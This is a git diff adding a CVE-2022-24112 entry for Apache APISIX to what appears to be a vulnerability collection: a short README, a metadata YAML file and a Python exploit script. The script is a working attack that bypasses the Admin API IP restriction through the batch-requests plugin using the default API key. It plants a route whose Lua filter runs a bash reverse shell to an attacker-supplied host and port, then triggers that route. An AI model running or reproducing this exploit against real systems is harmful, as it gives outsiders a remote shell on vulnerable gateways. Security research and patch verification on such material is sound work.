diff --git a/cve/Apache-APISIX/2022/cve-2022-24112/README.md b/cve/Apache-APISIX/2022/cve-2022-24112/README.md
new file mode 100644
index 0000000000000000000000000000000000000000..c099b3925d89ea1ff28d8fd4a35491ab5c6f99ec
--- /dev/null
+++ b/cve/Apache-APISIX/2022/cve-2022-24112/README.md
@@ -0,0 +1,21 @@
+# Apache APISIX Remote Code Execution (CVE-2022-24112) Exploit
+
+## Summary
+An attacker can abuse the batch-requests plugin to send requests to
+bypass the IP restriction of Admin API.
+A default configuration of Apache APISIX (with default API key) is
+vulnerable to remote code execution.
+When the admin key was changed or the port of Admin API was changed to
+a port different from the data panel, the impact is lower. But there
+is still a risk to bypass the IP restriction of Apache APISIX's data
+panel.
+
+There is a check in the batch-requests plugin which overrides the
+client IP with its real remote IP. But due to a bug in the code, this
+check can be bypassed.
+
+## Remediation
+upgrade to 2.10.4 or 2.12.1.
+
+
+ 
diff --git a/cve/Apache-APISIX/2022/cve-2022-24112/apisix-exploit.py b/cve/Apache-APISIX/2022/cve-2022-24112/apisix-exploit.py
new file mode 100644
index 0000000000000000000000000000000000000000..d852816517046d0fe7542b5b4c426e301e3be78f
--- /dev/null
+++ b/cve/Apache-APISIX/2022/cve-2022-24112/apisix-exploit.py
@@ -0,0 +1,79 @@
+import requests
+import sys
+
+
+class color:
+    HEADER = '\033[95m'
+    IMPORTANT = '\33[35m'
+    NOTICE = '\033[33m'
+    OKBLUE = '\033[94m'
+    OKGREEN = '\033[92m'
+    WARNING = '\033[93m'
+    RED = '\033[91m'
+    END = '\033[0m'
+    UNDERLINE = '\033[4m'
+    LOGGING = '\33[34m'
+color_random=[color.HEADER,color.IMPORTANT,color.NOTICE,color.OKBLUE,color.OKGREEN,color.WARNING,color.RED,color.END,color.UNDERLINE,color.LOGGING]    
+    
+
+def banner():
+    run = color_random[6]+'''\n                                   .     , 
+        _.._ * __*\./ ___  _ \./._ | _ *-+-
+       (_][_)|_) |/'\     (/,/'\[_)|(_)| | 
+          |                     |          
+\n'''
+    run2 = color_random[2]+'''\t\t(CVE-2022-24112)\n'''           
+    run3 = color_random[4]+'''{ Coded By: Ven3xy  | Github: https://github.com/M4xSec/ }\n\n'''
+    print(run+run2+run3)    
+
+if (len(sys.argv) != 4):
+    banner()
+    print("[!] Usage   : ./apisix-exploit.py <target_url> <lhost> <lport>")
+    exit()
+    
+else:
+    banner()
+    target_url = sys.argv[1]  
+    lhost = sys.argv[2]
+    lport = sys.argv[3]
+    
+headers1 = {
+    'Host': '127.0.0.1:8080',
+    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.81 Safari/537.36 Edg/97.0.1072.69',
+    'X-API-KEY': 'edd1c9f034335f136f87ad84b625c8f1',
+    'Accept': '*/*',
+    'Accept-Encoding': 'gzip, deflate',
+    'Content-Type': 'application/json',
+    'Content-Length': '540',
+    'Connection': 'close',
+}
+
+headers2 = {
+    'Host': '127.0.0.1:8080',
+    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.81 Safari/537.36 Edg/97.0.1072.69',
+    'X-API-KEY': 'edd1c9f034335f136f87ad84b625c8f1',
+    'Accept': '*/*',
+    'Accept-Encoding': 'gzip, deflate',
+    'Content-Type': 'application/json',
+    'Connection': 'close',
+}
+
+json_data = {
+    'headers': {
+        'X-Real-IP': '127.0.0.1',
+        'X-API-KEY': 'edd1c9f034335f136f87ad84b625c8f1',
+        'Content-Type': 'application/json',
+    },
+    'timeout': 1500,
+    'pipeline': [
+        {
+            'path': '/apisix/admin/routes/index',
+            'method': 'PUT',
+            'body': '{"uri":"/rms/fzxewh","upstream":{"type":"roundrobin","nodes":{"schmidt-schaefer.com":1}},"name":"wthtzv","filter_func":"function(vars) os.execute(\'bash -c \\\\\\"0<&160-;exec 160<>/dev/tcp/'+lhost+'/'+lport+';sh <&160 >&160 2>&160\\\\\\"\'); return true end"}',
+        },
+    ],
+}
+
+response1 = requests.post(target_url+'apisix/batch-requests', headers=headers1, json=json_data, verify=False)
+
+response2 = requests.get(target_url+'rms/fzxewh', headers=headers2, verify=False) 
diff --git a/cve/Apache-APISIX/2022/yaml/CVE-2022-24112.yaml b/cve/Apache-APISIX/2022/yaml/CVE-2022-24112.yaml
new file mode 100644
index 0000000000000000000000000000000000000000..883d103f4046c2f7624ddf38cb766b838197bbdb
--- /dev/null
+++ b/cve/Apache-APISIX/2022/yaml/CVE-2022-24112.yaml
@@ -0,0 +1,19 @@
+id: CVE-2022-24112
+source: https://github.com/M4xSec/Apache-APISIX-CVE-2022-24112
+info:
+  name:  Apache APISIX Dashboard 是 Apache APISIX 网关的可视化管理界面
+  severity: critical
+  description: Apache APISIX APISIX/batch requests插件允许将X-REAL-IP头重写为RCE；攻击者可以滥用批处理请求插件发送请求以绕过Admin API的IP限制。Apache APISIX的默认配置（带有默认API密钥）易受远程代码执行的攻击。当管理密钥被更改或管理API的端口被更改为不同于数据面板的端口时，影响较小。但绕过Apache APISIX数据面板的IP限制仍然存在风险。在批处理请求插件中有一个检查，它用实际的远程IP覆盖客户端IP。但由于代码中的一个错误，可以绕过此检查。
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-24112
+    - https://www.openwall.com/lists/oss-security/2022/02/11/3
+    - https://twitter.com/sirifu4k1/status/1496043663704858625
+    - https://apisix.apache.org/zh/docs/apisix/plugins/batch-requests
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.80
+    cve-id: CVE-2022-24112
+    cwe-id: CWE-290
+    cnvd-id: None
+    kve-id: None
+  tags: cve2022
\ No newline at end of file